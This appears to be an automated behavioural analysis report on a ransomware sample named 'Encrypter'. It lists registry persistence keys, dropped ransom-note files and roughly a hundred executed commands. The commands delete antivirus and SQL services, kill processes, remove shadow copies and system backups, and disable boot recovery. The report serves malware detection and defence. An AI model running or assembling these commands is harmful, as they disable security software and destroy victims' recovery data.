Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Encrypter_074' = '%APPDATA%\info.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'userinfo' = '%APPDATA%\recovery.txt'
- [<HKCU>\Software\Classes\.guesswho\shell\open\command] '' = 'notepad.exe %APPDATA%\recovery.txt'
Creates the following files on removable media
- <Drive name for removable media>:\how recovery files.txt
- <Drive name for removable media>:\grupposupp@protonmail.ch.url
- <Drive name for removable media>:\price030215.zip
- <Drive name for removable media>:\productos.zip
- <Drive name for removable media>:\contractualdeadlines.zip
- <Drive name for removable media>:\fiche_inscription_2015.zip
- <Drive name for removable media>:\2013_smccc_competition_points_jul2013.xlsx
Malicious functions
To complicate detection of its presence in the operating system,
deletes volume shadow copies.
Terminates or attempts to terminate
the following system processes:
- %WINDIR%\syswow64\cmd.exe
Modifies file system
Creates the following files
- %APPDATA%\info.exe
- %APPDATA%\recovery.txt
- %APPDATA%\grupposupp@protonmail.ch.url
- <Current directory>\how recovery files.txt
- <Current directory>\grupposupp@protonmail.ch.url
- D:\how recovery files.txt
- D:\grupposupp@protonmail.ch.url
- %HOMEPATH%\videos\how recovery files.txt
- %HOMEPATH%\videos\grupposupp@protonmail.ch.url
- %HOMEPATH%\how recovery files.txt
- %HOMEPATH%\grupposupp@protonmail.ch.url
- %HOMEPATH%\saved games\how recovery files.txt
- %HOMEPATH%\saved games\grupposupp@protonmail.ch.url
Moves the following files
- from %HOMEPATH%\saved games\grupposupp@protonmail.ch.url to %HOMEPATH%\saved games\hfko2quqas.guesswho
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "Hyper-V"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im msmdsrv.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlservr.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlwriter.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlbrowser.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' rem Kill "SQL"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "UniFi"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ofcservice"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ntrtscan"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmProxy"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "tmlisten"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "VSApiNt"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlceip.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMiCRCScanService"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMSmartRelayService"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmPreFilter"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "tmusa"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMLWCSService"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmFilter"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Trend Micro"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "kltap"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "KSDE1.0.0"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmCCSF"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "postgresql-x64-9.4"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im fdlauncher.exe' (with hidden window)
- '%WINDIR%\syswow64\wbem\wmic.exe' wmic SHADOWCOPY DELETE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c wmic SHADOWCOPY DELETE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c wbadmin DELETE SYSTEMSTATEBACKUP' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit.exe /set {default} recoveryenabled No' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin.exe Delete Shadows /All /Quiet' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' vssadmin.exe Delete Shadows /All /Quiet' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klhk"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im MsDtsSrvr.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im UniFi.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' rem Kill' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im postgres.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im pg_ctl.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im msftesql.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im ReportingServicesService.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im fdhost.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im SQLAGENT.EXE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im Ssms.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klmouflt"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klkbdflt"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klbackupflt"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLSERVER"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$VEEAMSQL2012"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$VEEAMSQL2012"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLWriter"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SSISTELEMETRY130"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MsDtsServer130"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLTELEMETRY"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLBrowser"' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC MINUTE /TN Encrypter /TR %APPDATA%\info.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLServerOLAPService"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLFDLauncher"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "SQL"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicvss"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmictimesync"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "storflt"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicrdv"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicheartbeat"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicshutdown"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicguestinterface"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmickvpexchange"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLSERVERAGENT"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MsDtsServer100"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMBMServer"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ReportServer"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klbackupdisk"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klflt"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klpd"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "KLIF"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "AVP18.0.0"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klim6"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Kaspersky"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ekrn"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: ESET"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLTELEMETRY$HL"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "WRSVC"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLServerADHelper100"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "msftesql$SQLEXPRESS"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ReportServer$OPTIMA"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$OPTIMA"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$OPTIMA"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLFDLauncher$OPTIMA"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$WOLTERSKLUWER"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$PROGID"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$WOLTERSKLUWER"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$PROGID"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Webroot"' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC ONLOGON /TN EncrypterSt /TR %APPDATA%\info.exe' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "Hyper-V"
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im msmdsrv.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlservr.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlwriter.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlbrowser.exe
- '%WINDIR%\syswow64\cmd.exe' rem Kill "SQL"
- '%WINDIR%\syswow64\cmd.exe' sc delete "UniFi"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ofcservice"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ntrtscan"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmProxy"
- '%WINDIR%\syswow64\cmd.exe' sc delete "tmlisten"
- '%WINDIR%\syswow64\cmd.exe' sc delete "VSApiNt"
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlceip.exe
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMiCRCScanService"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMSmartRelayService"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmPreFilter"
- '%WINDIR%\syswow64\cmd.exe' sc delete "tmusa"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMLWCSService"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmFilter"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Trend Micro"
- '%WINDIR%\syswow64\cmd.exe' sc delete "kltap"
- '%WINDIR%\syswow64\cmd.exe' sc delete "KSDE1.0.0"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmCCSF"
- '%WINDIR%\syswow64\cmd.exe' sc delete "postgresql-x64-9.4"
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im fdlauncher.exe
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC MINUTE /TN Encrypter /TR %APPDATA%\info.exe
- '%WINDIR%\syswow64\cmd.exe' /c wmic SHADOWCOPY DELETE
- '%WINDIR%\syswow64\cmd.exe' /c wbadmin DELETE SYSTEMSTATEBACKUP
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit.exe /set {default} recoveryenabled No
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin.exe Delete Shadows /All /Quiet
- '%WINDIR%\syswow64\cmd.exe' TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"
- '%WINDIR%\syswow64\cmd.exe' vssadmin.exe Delete Shadows /All /Quiet
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET
- '%WINDIR%\syswow64\cmd.exe' sc delete "klhk"
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im MsDtsSrvr.exe
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im UniFi.exe
- '%WINDIR%\syswow64\cmd.exe' rem Kill
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im postgres.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im pg_ctl.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im msftesql.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im ReportingServicesService.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im fdhost.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im SQLAGENT.EXE
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im Ssms.exe
- '%WINDIR%\syswow64\cmd.exe' sc delete "klmouflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klkbdflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klbackupflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLSERVER"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$VEEAMSQL2012"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$VEEAMSQL2012"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLWriter"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SSISTELEMETRY130"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MsDtsServer130"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLTELEMETRY"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLBrowser"
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC ONLOGON /TN EncrypterSt /TR %APPDATA%\info.exe
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLServerOLAPService"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLFDLauncher"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "SQL"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicvss"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmictimesync"
- '%WINDIR%\syswow64\cmd.exe' sc delete "storflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicrdv"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicheartbeat"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicshutdown"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicguestinterface"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmickvpexchange"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLSERVERAGENT"
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot
- '%WINDIR%\syswow64\cmd.exe' sc delete "MsDtsServer100"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMBMServer"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ReportServer"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klbackupdisk"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klpd"
- '%WINDIR%\syswow64\cmd.exe' sc delete "KLIF"
- '%WINDIR%\syswow64\cmd.exe' sc delete "AVP18.0.0"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klim6"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Kaspersky"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ekrn"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: ESET"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLTELEMETRY$HL"
- '%WINDIR%\syswow64\cmd.exe' sc delete "WRSVC"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLServerADHelper100"
- '%WINDIR%\syswow64\cmd.exe' sc delete "msftesql$SQLEXPRESS"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ReportServer$OPTIMA"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$OPTIMA"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$OPTIMA"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLFDLauncher$OPTIMA"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$WOLTERSKLUWER"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$PROGID"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$WOLTERSKLUWER"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$PROGID"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Webroot"
- '<SYSTEM32>\vssvc.exe'